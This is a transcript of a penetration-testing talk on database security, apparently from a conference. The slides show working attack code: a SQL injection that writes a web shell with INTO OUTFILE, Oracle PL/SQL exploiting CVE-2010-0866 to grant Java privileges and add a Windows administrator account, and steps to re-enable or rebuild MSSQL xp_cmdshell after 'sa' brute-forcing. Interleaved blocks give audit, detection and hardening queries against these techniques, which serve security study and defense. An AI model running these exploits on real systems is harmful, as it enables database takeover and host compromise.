Rock'n Roll in Database Security
Transcript

  • 1. Rock'n Roll in Database Security
    - Prathan Phongthiproek (Lucifer@CITEC)
    - Senior Information Security Consultant, ACIS Professional Center
  • 2. Who am I?
    - CITEC Evolution
      - Code name "Lucifer"; moderator, speaker
      - Instructor: Web Application (In)Security 101
      - Instructor: Mastering in Exploitation
    - ACIS Professional Center
      - Red Team: penetration tester
      - Instructor / speaker
      - Security consultant / researcher
    - Founder of CWH Underground Hacker
      - Exploits, vulnerabilities, papers disclosure
      - Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc.
      - http://www.exploit-db.com/author/?a=1275
  • 3. Let's Talk!? "Get DBA privilege is good but get SHELL is better!!"
    - MySQL PWNED!! From web application to get SHELL
    - Oracle escalating privilege XPL to get SHELL
    - MSSQL credentials attack to get SHELL
  • 4. MSSQL and Oracle Vulnerabilities (bar chart: vulnerabilities per year, y-axis 0 to 160; the two series are listed in the order the chart legend gives them)
    Year         2002  2003  2004  2005  2006  2007  2008  2009
    SQL Server     24     3     0     0     0     0    11     0
    Oracle         46    12    25    61   144    41    48    36
  • 5. MySQL Jump into OS
    - MySQL 5.x vulnerability, 0-day on Immunity CANVAS
    - SQL injection via web application (top hit!!)
    - MySQL OUTFILE function
      - Needs a writable directory
      - Needs the absolute path
      - Needs magic_quotes off
      - UNION SELECT 1,'code',3,4 INTO OUTFILE "/www/htdocs/shell.php"
    - MySQL LOAD_FILE function (better!!)
      - Needs the absolute path
      - Needs the phpMyAdmin path, or MySQL port 3306 open at the firewall
      - UNION SELECT 1,LOAD_FILE(0x4332…………)
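Both MySQL tricks on slide 5 depend on two server-side preconditions: the web application's database account holds the global FILE privilege, and the server allows file reads and writes anywhere the mysqld OS user can reach. The MySQL statements below are an added example, not part of the talk, that audit those preconditions and remove them; the account name 'webapp'@'localhost' is an assumed placeholder.

```sql
-- Added example (not from the talk): audit and harden the MySQL
-- preconditions the INTO OUTFILE / LOAD_FILE technique relies on.

-- 1. Which accounts hold the global FILE privilege? Both INTO OUTFILE
--    and LOAD_FILE require it; a web application account never needs it.
SELECT user, host
  FROM mysql.user
 WHERE File_priv = 'Y';

-- 2. Where may the server read and write files at all?
--    ''          = anywhere the mysqld OS user can write (the slide's case)
--    NULL        = file import/export disabled entirely
--    '/some/dir' = restricted to that directory (newer releases default to one)
--    The variable is read-only at runtime; set it under [mysqld] in my.cnf.
SHOW VARIABLES LIKE 'secure_file_priv';

-- 3. Remediation for an over-privileged application account
--    ('webapp'@'localhost' is an assumed placeholder name).
REVOKE FILE ON *.* FROM 'webapp'@'localhost';
FLUSH PRIVILEGES;

-- 4. Confirm the account is now limited to table-level rights on its own
--    schema (SELECT/INSERT/UPDATE/DELETE), with no global privileges left.
SHOW GRANTS FOR 'webapp'@'localhost';
```

With FILE revoked the injected UNION SELECT ... INTO OUTFILE fails with a privilege error even when the directory is writable and the absolute path is known, and secure_file_priv set to a dedicated directory or NULL closes the path for every account that still holds the privilege.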
  • 6. MySQL PWNED!! From web application to get SHELL
  • 7. Oracle Escalating Privilege XPL to get SHELL – PL/SQL Injection
    - dbms_cdc_publish3 – for Oracle 10gR1–11gR2
    - dbms_cdc_publish2
    - dbms_cdc_publish
    - dbms_metadata_open
    - dbms_export_extension
    - lt_findricset_cursor
    - lt_compressworkspace
    - lt_mergeworkspace
    - lt_removeworkspace
    - lt_rollbackworkspace
  • 8. Oracle Escalating Privilege XPL to get SHELL
    - DBMS_JVM_EXP_PERMS: a package that allows any user with create privilege to grant themselves Java IO privileges
    - CVE-2010-0866
    - Affects Oracle 10g–11g (Windows only)
    - Defense
      - Apply the October 2010 Critical Patch Update
      - Oracle 11gR2 on Windows is still secure
      - Revoke the privilege to execute DBMS_JVM_EXP_PERMS from users
  • 9. Oracle Escalating Privilege XPL to get SHELL
    - XPL code (grant Java IO privilege):
      DECLARE
        POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
        CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL;
      BEGIN
        OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1;
        DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
      END;

      DECLARE
        POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
        CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;
      BEGIN
        OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1;
        DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
      END;

      DECLARE
        POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
        CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;
      BEGIN
        OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1;
        DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
      END;
  • 10. Oracle Escalating Privilege XPL to get SHELL
    - XPL code (OS execute):
      select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\windows\system32\cmd.exe','/c','net user prathan 1234 /add') from dual;
      select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\windows\system32\cmd.exe','/c','net localgroup administrators prathan /add') from dual;
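The defense bullet on slide 8 says to revoke execute on DBMS_JVM_EXP_PERMS, and the three blocks on slide 9 each leave a row in the database's Java policy table. The Oracle SQL below is an added example, not the talk's own code: it lists who can reach the package, looks for the policy grants the exploit creates, and removes both. APPUSER is an assumed placeholder for a grantee the detection query might return.

```sql
-- Added example (not from the talk): Oracle SQL for the slide 8 defense
-- and for detecting what the slide 9 grants leave behind. Run as SYS or a DBA.

-- 1. Who may execute the package? If PUBLIC appears, every account can
--    run it, which is the precondition for the slide 9 exploit.
SELECT grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_JVM_EXP_PERMS';

-- 2. Detection: Java policy grants of <<ALL FILES>> or file-descriptor
--    runtime permissions to anyone other than SYS match the three
--    IMPORT_JVM_PERMS blocks on slide 9 row for row.
SELECT seq, grantee, type_name, name, action, enabled
  FROM dba_java_policy
 WHERE kind = 'GRANT'
   AND grantee <> 'SYS'
   AND (   (type_name = 'java.io.FilePermission'
            AND name = '<<ALL FILES>>')
        OR (type_name = 'java.lang.RuntimePermission'
            AND name IN ('writeFileDescriptor', 'readFileDescriptor')));

-- 3. Remediation, in addition to applying the October 2010 CPU:
--    take the package away from PUBLIC ...
REVOKE EXECUTE ON SYS.DBMS_JVM_EXP_PERMS FROM PUBLIC;

--    ... and revoke any stray grant found in step 2 (APPUSER is an
--    assumed placeholder; the arguments mirror the slide 9 GRANT row).
BEGIN
  DBMS_JAVA.REVOKE_PERMISSION('APPUSER',
                              'SYS:java.io.FilePermission',
                              '<<ALL FILES>>',
                              'execute');
END;
/

-- 4. Re-run step 2: it should return no rows.
```

Step 2 is also worth scheduling as a recurring check, because the policy rows persist across sessions and survive the patch: the CPU stops new grants from being imported but does not remove ones already present.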
  • 11. Oracle Escalating Privilege XPL to get SHELL
  • 12. MSSQL Credentials Attack to get SHELL
    - 'sa' is the God account; it runs with SYSTEM privilege on Windows
    - The default 'sa' password is blank or guessable
    - Requires the xp_cmdshell stored procedure (disabled by default on MSSQL 2005+)
    - Enable it with osql
    - On MSSQL 2005:
      EXEC sp_configure 'show advanced options', 1
      RECONFIGURE
      EXEC sp_configure 'xp_cmdshell', 1
      RECONFIGURE
  • 13. MSSQL Credentials Attack to get SHELL
    - On MSSQL 2000
    - xp_cmdshell was dropped by sp_dropextendedproc
    - Re-register it: EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll'
    - Or re-create it through OLE automation:
      CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
      DECLARE @result int, @OLEResult int, @RunResult int
      DECLARE @ShellID int
      EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
      IF @OLEResult <> 0 SELECT @result = @OLEResult
      IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
      EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
      IF @OLEResult <> 0 SELECT @result = @OLEResult
      IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
      EXECUTE @OLEResult = sp_OADestroy @ShellID
      return @result
  • 14. MSSQL Credentials Attack to get SHELL
    - Brute-force the 'sa' password and use the sa credentials to run OS commands on the target machine with Metasploit modules
      - scanner/mssql/mssql_ping
      - scanner/mssql/mssql_login
      - admin/mssql/mssql_exec
      - windows/smb/psexec
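Slides 12 to 14 describe one chain: a weak or blank 'sa' password, xp_cmdshell enabled (or rebuilt with sp_addextendedproc or the sp_OA* automation procedures), and an engine running as SYSTEM. The T-SQL below is an added example, not part of the talk, that checks each link from the DBA side, looks for the rebuilt procedure, and closes the chain. It assumes SQL Server 2005 or later; the password value is a placeholder.

```sql
-- Added example (not from the talk): T-SQL audit of the slide 12-14
-- preconditions, detection of a rebuilt xp_cmdshell, and remediation.

-- 1. 'sa': still enabled? blank password? password equal to the login name?
--    PWDCOMPARE returns 1 when the clear-text candidate matches the stored hash.
SELECT name,
       is_disabled,
       PWDCOMPARE('',   password_hash) AS blank_password,
       PWDCOMPARE(name, password_hash) AS password_is_login_name
  FROM sys.sql_logins
 WHERE name = 'sa';

-- 2. Does the engine really run as SYSTEM? (sys.dm_server_services needs
--    SQL Server 2008 R2 SP1 or later.) A dedicated low-privilege service
--    account limits what xp_cmdshell can do even when it is enabled.
SELECT servicename, service_account
  FROM sys.dm_server_services;

-- 3. Server options the attack path needs: xp_cmdshell itself and the
--    sp_OA* automation procedures used on slide 13 to rebuild it.
SELECT name, value_in_use
  FROM sys.configurations
 WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');

-- 4. Detection: a hand-made xp_cmdshell is a user object in master, and a
--    re-registered one is a non-Microsoft extended procedure bound to a DLL.
SELECT o.name, o.type_desc, o.create_date
  FROM master.sys.objects AS o
 WHERE o.name LIKE 'xp[_]%'
   AND o.is_ms_shipped = 0;

SELECT name, dll_name, create_date
  FROM master.sys.extended_procedures
 WHERE is_ms_shipped = 0;

-- 5. Detection: the slide 14 brute force leaves one error 18456 entry per
--    failed attempt in the current SQL error log.
EXEC master.dbo.xp_readerrorlog 0, 1, N'Login failed for user';

-- 6. Remediation: disable the shell paths and neutralise 'sa'.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
ALTER LOGIN sa WITH PASSWORD = '<strong-password-placeholder>';
ALTER LOGIN sa DISABLE;
```

Disabling xp_cmdshell through sp_configure does not remove a procedure that was recreated under the same name in master, which is why step 4 checks the object catalog rather than only the configuration value; any row it returns should be dropped and its origin investigated.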
  • 15. IPWN4 – PenTest Tools (Jail-Broken)
    - Pen-test tools (command-line)
      - Metasploit Framework
      - Social Engineering Toolkit
      - Nmap scanner, Amap, Hping
      - Nbtscan, netcat
      - Nikto2, dnsmap
      - Ettercap-NG, Aircrack-NG
    - GUI tools
      - iTeleport
      - Jaadu RDP
      - iNet
      - WiFiFoFum
  • 16. Full Compromise MSSQL via iPhone 4
